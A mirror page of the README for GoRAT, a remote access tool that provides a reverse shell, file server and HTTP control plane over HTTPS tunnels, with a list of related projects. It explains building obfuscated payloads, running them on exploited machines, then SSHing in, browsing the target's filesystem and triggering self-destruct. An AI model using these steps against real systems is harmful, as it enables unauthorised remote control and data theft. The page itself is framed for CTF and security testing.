GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → JustinTimperio → GoRAT

JustinTimperio / GoRAT

Licence: MIT license
GoRAT (Go Remote Access Tool) is an extremely powerful reverse shell, file server, and control plane using HTTPS reverse tunnels as a transport mechanism.

Programming Languages

go
31211 projects - #10 most used programming language
shell
77523 projects
Dockerfile
14818 projects

Labels

androidwindowsmacoslinuxfreebsdarmopenbsdreverse-shellmipshttpsfile-serverx86pentestingctfarm64

Projects that are alternatives of or similar to GoRAT

static-web-server
A blazing fast and asynchronous web server for static files-serving. ⚡
Stars: ✭ 230 (+576.47%)
Mutual labels:  freebsd, arm, file-server, x86, arm64
Keystone
Keystone assembler framework: Core (Arm, Arm64, Hexagon, Mips, PowerPC, Sparc, SystemZ & X86) + bindings
Stars: ✭ 1,654 (+4764.71%)
Mutual labels:  arm, mips, x86, arm64
Capstone
Capstone disassembly/disassembler framework: Core (Arm, Arm64, BPF, EVM, M68K, M680X, MOS65xx, Mips, PPC, RISCV, Sparc, SystemZ, TMS320C64x, Web Assembly, X86, X86_64, XCore) + bindings.
Stars: ✭ 5,374 (+15705.88%)
Mutual labels:  arm, mips, x86, arm64
Keypatch
Multi-architecture assembler for IDA Pro. Powered by Keystone Engine.
Stars: ✭ 939 (+2661.76%)
Mutual labels:  arm, mips, x86, arm64
Unicorn
Unicorn CPU emulator framework (ARM, AArch64, M68K, Mips, Sparc, PowerPC, RiscV, X86)
Stars: ✭ 4,934 (+14411.76%)
Mutual labels:  arm, mips, x86, arm64
Arm now
arm_now is a qemu powered tool that allows instant setup of virtual machines on arm cpu, mips, powerpc, nios2, x86 and more, for reverse, exploit, fuzzing and programming purpose.
Stars: ✭ 719 (+2014.71%)
Mutual labels:  arm, mips, x86
Bap
Binary Analysis Platform
Stars: ✭ 1,385 (+3973.53%)
Mutual labels:  arm, mips, x86
Cross
“Zero setup” cross compilation and “cross testing” of Rust crates
Stars: ✭ 2,461 (+7138.24%)
Mutual labels:  arm, mips, x86
asmdot
[Unstable] Fast, zero-copy and lightweight (Arm | Mips | x86) assembler in (C | C++ | C# | Go | Haskell | Javascript | Nim | OCaml | Python | Rust).
Stars: ✭ 23 (-32.35%)
Mutual labels:  arm, mips, x86
Steed
[INACTIVE] Rust's standard library, free of C dependencies, for Linux systems
Stars: ✭ 520 (+1429.41%)
Mutual labels:  arm, mips, x86
Mandibule
linux elf injector for x86 x86_64 arm arm64
Stars: ✭ 171 (+402.94%)
Mutual labels:  arm, x86, arm64
cross
“Zero setup” cross compilation and “cross testing” of Rust crates
Stars: ✭ 3,550 (+10341.18%)
Mutual labels:  arm, mips, x86
Rop Tool
A tool to help you write binary exploits
Stars: ✭ 590 (+1635.29%)
Mutual labels:  arm, mips, x86
alpine-php-fpm
Lightweight and optimised PHP-FPM (PHP 7.4, 8.0, 8.1) Docker images with essential extensions on top of latest Alpine Linux.
Stars: ✭ 53 (+55.88%)
Mutual labels:  arm, x86, arm64
Raspberrypipkg
DEPRECATED - DO NOT USE | Go here instead ->
Stars: ✭ 758 (+2129.41%)
Mutual labels:  freebsd, arm, arm64
Corehook
A library that simplifies intercepting application function calls using managed code and the .NET Core runtime
Stars: ✭ 191 (+461.76%)
Mutual labels:  arm, x86, arm64
Easy Linux Pwn
A set of Linux binary exploitation tasks for beginners on various architectures
Stars: ✭ 353 (+938.24%)
Mutual labels:  arm, mips, x86
toddler
Toddler is a well-designed usable and portable microkernel OS
Stars: ✭ 70 (+105.88%)
Mutual labels:  arm, mips, x86
Ataraxia
Simple and lightweight source-based multi-platform Linux distribution with musl libc.
Stars: ✭ 226 (+564.71%)
Mutual labels:  arm, mips, x86
Capstone.NET
.NET Core and .NET Framework binding for the Capstone Disassembly Framework
Stars: ✭ 108 (+217.65%)
Mutual labels:  arm, x86, arm64
View All Similar Projects ➔ 
 @@@@@@@@   @@@@@@   @@@@@@@    @@@@@@   @@@@@@@  
@@@@@@@@@  @@@@@@@@  @@@@@@@@  @@@@@@@@  @@@@@@@  
!@@        @@!  @@@  @@!  @@@  @@!  @@@    @@!    
!@!        !@!  @!@  !@!  @!@  !@!  @!@    !@!    
!@! @!@!@  @!@  !@!  @!@!!@!   @!@!@!@!    @!!    
!!! !!@!!  !@!  !!!  !!@!@!    !!!@!!!!    !!!    
:!!   !!:  !!:  !!!  !!: :!!   !!:  !!!    !!:    
:!:   !::  :!:  !:!  :!:  !:!  :!:  !:!    :!:    
 ::: ::::  ::::: ::  ::   :::  ::   :::     ::    
 :: :: :    : :  :    :   : :   :   : :     :

GitHub Go Reference Go Report Card Codacy Badge

GoRAT(Go Remote Access Tool) is an extremely powerful yet simple reverse shell, file server, and control plane using HTTPS reverse tunnels as a transport mechanism. (GoRAT is not anonymous and designed for CTF players, Go enthusiasts, and security experts.)

Supported Distros:

64Bit Distros 32Bit Distros
Linux Linux
FreeBSD FreeBSD
OpenBSD OpenBSD
Linux ARM Linux ARM
FreeBSD ARM FreeBSD ARM
OpenBSD ARM OpenBSD ARM
Linux MIPS Linux MIPS
MacOS (NOT BUILDING) MacOS
Android ARM (NOT BUILDING) Android ARM
Windows (kinda) Windows (kinda)

Installing and Building Native

  1. Set up a full GoLang build environment
  2. Install UPX
  3. Install Garble with go get mvdan.cc/garble
  4. Fill out config.sh
  5. Run ./build_payload.sh --all

Installing and Building with Docker

  1. Install and start docker
  2. Fill out config.sh
  3. Run ./build_payload.sh --docker

Using the Payloads

  1. Transfer the BUILD folder to your "attacking" machine, install bc and run ./start_server.sh
  2. Exploit your system and run the binary
  3. Connect to the "target" via normal ssh from the "attacking" machine

Chisel Server Usage

GoRAT uses the standard release binaries provided by the chisel project. The server requires a number of configure options and has fairly verbose logging. For this reason a small shell script is provided to start and parse the output of chisel for easy use. To use it, run the following:

  1. cd server
  2. ./start_server.sh

As clients connect you will see a log like this. We will use this log to access each clients SSH Server, HTTP File Server, and HTTP Control Server.

mr.robot@localhost:~# ./start_server.sh 
Starting Chisel Server on Port 1337
=============================================
Session #1 | Control Server Mounted On: 27818
Session #1 | SSH Server Mounted On: 27819
=============================================
Session #2 | Control Server Mounted On: 33132
Session #2 | SSH Server Mounted On: 33133

Payload Usage

As with many Go binaries, client executables require zero configure and simply need to be executed. In its current state GoRAT does not include any methods of persistence so if you would like to make it a service, you will need to do so by your own methods.

The payload also uses garble to produce a binary that works as well as a regular build, but has as little information about the original source code as possible.

SSH Server (Linux, FreeBSD, Darwin, OpenBSD)

Using the logs we can connect to clients directly via ssh using our standard unix OpenSSH package.

ssh localhost -p ####

WSSH Windows (The Problem Child)

WARNING THE WINDOWS SHELL IS TERRIBLE, THIS WAS JUST AN EXPERIMENT

Please check out this thread: creack/pty#109 (comment)

When connecting to Windows hosts the following command will not work as GoRAT does not have a Windows PTY. For Windows systems we connect using a custom wrapper written for GoRAT.

cd wssh
go build wssh.go
./wssh.go

Control Server

The control server is a simple http mechanism that translates /some-page to internal go commands. In this way, requesting a webpage results directly in the execution of code on a client system. While this mechanism is not very sophisticated, it is extremely reliable and performant. The api current has the following commands:

  1. http://localhost:port/ - Returns a status code of OK if the host is online and responding to requests
  2. http://localhost:port/hardware - Reports basic hardware survey of device in json
  3. http://localhost:port/stop - Closes the client payload WITHOUT self-destruction
  4. http://localhost:port/uninstall - Terminates the client payload AND self-destructs

File Server

Each client's file server can be accessed on the same port as the control server. The file server is, from a technical standpoint, directly part of Control Server. Files and directories can be accessed at http://localhost:####/fs/ through your browser or tools like wget and curl.

[robot@localhost ~]$ curl localhost:14963/fs/
<pre>
<a href="bin">bin</a>
<a href="boot/">boot/</a>
<a href="dev/">dev/</a>
<a href="etc/">etc/</a>
<a href="home/">home/</a>
<a href="keybase/">keybase/</a>
<a href="lib">lib</a>
<a href="lib64">lib64</a>
<a href="lost+found/">lost+found/</a>
<a href="mnt/">mnt/</a>
<a href="opt/">opt/</a>
<a href="proc/">proc/</a>
<a href="root/">root/</a>
<a href="run/">run/</a>
<a href="sbin">sbin</a>
<a href="srv/">srv/</a>
<a href="sys/">sys/</a>
<a href="test/">test/</a>
<a href="tmp/">tmp/</a>
<a href="usr/">usr/</a>
<a href="var/">var/</a>
</pre>

Architecture

GoRAT uses chisel and gliderlabs ssh server to create a high performance remote reverse tunnel over HTTPS. The diagram below shows how GoRAT establishes a link between multiple “targets” and a single “attacker”. image

Disclaimer

Use of GoRAT for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. We assume no liability and are not responsible for any misuse or damage caused by this software. Only use for educational purposes / ethical hacking. Multiple tools in this software include their own license.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].